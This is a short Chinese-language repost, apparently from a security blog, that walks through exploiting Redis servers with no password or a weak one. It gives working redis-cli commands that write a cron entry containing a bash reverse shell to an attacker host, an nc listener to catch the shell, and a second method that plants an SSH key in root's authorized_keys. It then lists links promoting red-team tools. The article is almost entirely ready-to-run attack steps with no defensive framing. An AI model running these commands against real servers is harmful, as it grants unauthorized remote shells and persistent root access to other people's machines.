redis弱密码漏洞利用
2023-2-4 14:20:24 Author: 系统安全运维(查看原文) 阅读量:26 收藏

背景:

redis无认证,或者弱密码,可以成功连接到redis服务器

反弹shell拿到的权限取决于redis的启动账号

操作:

1. Centos7安装redis客户端

#yum install redis --查看是否有redis yum 源#yum install epel-release --下载fedora的epel仓库# yum install redis -- 安装redis数据库

【漏洞利用方法1 写crontab,反弹shell】

2.连接redis服务器,执行命令

#redis-cli -h 10.1.1.2 -a 123456 //如果没有密码,不用添加-a参数10.1.1.2:6379> config set dir /var/spool/cronOK10.1.1.2:6379> config set dbfilename rootOK10;1.1.2:6379> set xxoo "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"10.1.1.2:6379>saveOK

上面的方法是需要先连接到redis服务器,然后再执行命令,也可以直接执行命令,无需连接

#echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -a 123456 -x set 1#redis-cli -h 192.168.118.129 -a 123456 config set dir /var/spool/cron/#redis-cli -h 192.168.118.129 -a 123456 config set dbfilename root#redis-cli -h 192.168.118.129 -a 123456 save 

3.在 10.1.1.1上执行

#nc -l -p 1234 -vv //监听1234端口

很快就能收到shell

【漏洞利用方法2 写authorized_keys 实现无密码登录】

 执行命令如下:

127.0.0.1:6379>flushallOK127.0.0.1:6379>config set dir /root/.ssh/OK127.0.0.1:6379>config set dbfilename authorized_keysOK127.0.0.1:6379>set xxoo "\n\n\nssh-rsa [email protected]ost.localdomain\n\n"OK127.0.0.1:6379>saveOK

然后ssh 连接目标服务器即可

转自https://www.cnblogs.com/Kevin-1967/p/8940137.html

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247515821&idx=2&sn=d9ad1e5357506547602c8be86416e900&chksm=c3086dddf47fe4cb2fe9b7b08e7d124c6b1127cee02aceff6b858cddae6e13eeb94e6a58bc63#rd
如有侵权请联系:admin#unsafe.sh